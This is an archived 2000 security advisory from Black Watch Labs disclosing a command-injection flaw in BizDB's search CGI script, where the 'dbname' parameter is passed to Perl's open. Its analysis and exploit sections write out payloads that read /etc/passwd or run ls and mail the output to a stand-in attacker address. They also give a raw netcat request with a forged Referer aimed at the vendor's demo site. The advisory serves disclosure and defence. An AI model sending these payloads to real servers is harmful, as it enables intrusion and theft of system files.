BizDB Search Script Enables Shell Command Execution at the Server

[blackwatchlabs () PERFECTOTECH COM (Black Watch Labs)]

BizDB Search Script Enables Shell Command Execution at the Server

Perfecto's Black Watch Labs Security Advisory #00-04 (April 7th, 2000)

Name:   BizDB Search Script Enables Shell Command Execution at the
Server

Black Watch Labs ID:
BWL-00-04

Date Released:
April 7th, 2000

Category:
Application(HTML): Parameter Modification

Products affected:
BizDB

Summary:
BizDB is a database and search engine software by Cnctek. Part of the
installation is a CGI script, "bizdb-search.cgi" which is used to search
the bizdb database. This script is vulnerable to modification of its
paramater, in such way that causes it to run user provided shell
commands on the server.

Analysis:
The bizdb-search.cgi script is probably a Perl script which utilizes the
open command without protection or input sanity checks. The open command
is used in order to open the database whose name appears in the user
input. As a result, an attacker can change this parameter and take
advantage of the piping feature, so that instead of the original
database file name, say "bizdb", the attacker sends "; ... exploit
commands ...|", such as ";cat%20/etc/passwd|mail%20attacker () evil site|",
in order to send the contents of /etc/passwd file (assuming a UNIX
server) to the attacker's email account. The script optionally checks
for the HTTP_REFERER field to possess some specific value (that of the
referring page), but this field can easily be forged if the request is
generated by a raw TCP/IP client (such as "netcat", and perhaps even
"telnet"), by sending the raw GET request line (GET url HTTP/1.0)
followed by a Referer line (Referer: page), where the page is the one in
which the form was found.

Exploits:
The demonstration area provided by Cnctek has a link that searches for
all companies in the database whose name starts with 'A'. This link is
http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=bizdb&f6=^a.*&action=searchdbdisplay
(this link does not work as it does not contain the referer which is why
netcat must be used to exploit the vulnerability). If an attacker
changes the "dbname" parameter into ";ls|mail%20attacker () evil site|" and
sends the modified request:
http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20attacker () evil 
site|&f6=^a.*&action=searchdbdisplay
, the results of the ls command will be sent to the attacker's email
account. The arguments for the netcat command should be www.cnctek.com
80, and the exact lines for the netcat input (i.e. the HTTP request)
are:
GET
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20attacker () evil 
site|&f6=^a.*&action=searchdbdisplay
HTTP/1.0
Host: www.cnctek.com
Referer: http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?bizdb-search
(empty line)
(End of Input)

Number of affected sites/pages/users:
We assume up to a thousand pages utilize BizDB.

Vendor Status:
The vendor was contacted, but does not seem to understand the nature of
the problem. In their reply, they claim that there exists a mechanism
that prevents the exploit. We strongly suspect they refer to ensuring
that the  "HTTP_REFERER" environment variable matches the referring page
in the site. Again, this provides no extra security, as it can by easily
bypassed by forging the HTTP request.

Vendor Patch or workaround:
Not available at the time of this release.

References and Links:
CNCTek: http://www.cnctek.com/
BizDB section: http://www.cnctek.com/bizdb-html/
BizDB demonstration:
http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?bizdb-search

About Black Watch Labs (http://www.perfectotech.com/blackwatchlabs/)
Black Watch Labs is a research group operated by Perfecto Technologies
Ltd., the leader in Web application security management. Black Watch
Labs was established to further the knowledge of Web application
security within the Internet community.

About Perfecto Technologies (www.perfectotech.com)
Founded in 1997 and headquartered in Santa Clara, Calif., Perfecto
Technologies is the leader in Web Application Security Management
software. AppShield™, Perfecto's flagship product, is the first to
provide automatic Web site security, enabling companies to realize
faster time to market while meeting the demand for privacy and security.
Black Watch Labs was established to further the knowledge of Web
application security within the Internet security community. Privately
held, Perfecto is funded by blue-chip venture capital firms and industry
leaders, including Goldman Sachs, Intel Corporation, Sequoia Capital,
The Sprout Group and Walden Israel. More information about Perfecto
Technologies may be obtained by visiting the Company's Web site at
www.perfectotech.com or by calling the Company directly at (408)
855-9500.

Copyright © 1997-2000 Perfecto Technologies LTD. All rights reserved.
Permission is hereby granted to reproduce and distribute the application
security alerts herein in their entiretly, provided the information,
this notice and all other Perfecto Technologies marks remain intact.

Specific Limitations on Use of the Perfecto Technologies Website
THIS SITE INCLUDES INFORMATION WHICH WILL ILLUSTRATE CERTAIN SECURITY
RISKS AND ISSUES ASSOCIATED WITH SITES ON THE INTERNET, INCLUDING,
POTENTIALLY, YOUR SITE. YOU AGREE THAT YOUR VIEWING OF THIS SITE IS
SOLELY FOR THE PURPOSES OF UNDERSTANDING THESE RISKS AND ISSUES WITH
RESPECT TO YOUR SITE AND THE PRODUCTS AND SERVICES OFFERED BY PERFECTO
TECHNOLOGIES. YOU AGREE NOT TO USE ANY INFORMATION DISCLOSED TO YOU FOR
ANY IMPROPER OR ILLEGAL PURPOSE, INCLUDING TO VIOLATE THE SECURITY OF
ANY OTHER PERSON'S SITE. YOU ARE EXPLICITLY WARNED THAT THE USE FOR ANY
IMPROPER PURPOSE OF INFORMATION DISCLOSED TO YOU COULD SUBJECT YOU TO
CIVIL AND CRIMINAL LIABILITY IN THE UNITED STATES AND OTHER COUNTRIES.

NO WARRANTY
Any material furnished by Perfecto Technologies is furnished on an "as
is" basis and may change without notice. Perfecto Technologies makes no
warranties of any kind, either expressed or implied as to any matter
including but not limited to, warranty of fitness for a particular
purpose or merchantability, exclusivity or results obtained from use of
the material.  Neither does Perfecto Technologies make any warranty of
any kind with respect to freedom from patent, trademark or copyright
infringement. In no event shall Perfecto Technologies be liable for any
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.